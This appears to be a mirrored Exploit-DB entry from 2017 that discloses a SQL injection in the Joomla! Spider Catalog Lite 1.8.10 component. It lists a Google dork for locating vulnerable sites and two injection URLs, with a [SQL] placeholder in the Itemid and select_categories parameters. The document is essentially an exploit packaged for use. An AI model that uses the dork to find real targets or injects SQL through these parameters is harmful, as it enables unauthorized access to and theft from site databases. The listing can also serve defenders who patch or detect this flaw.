Joomla! Component Spider Catalog Lite 1.8.10 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-02-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41372/
  • # # # # # 
    # Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection
    # Google Dork: inurl:index.php?option=com_spidercatalog
    # Date: 16.02.2017
    # Vendor Homepage: http://web-dorado.com/
    # Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/
    # Demo: http://demo.web-dorado.com/spider-catalog.html
    # Version: 1.8.10
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL]
    # 
    http://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1
    # # # # #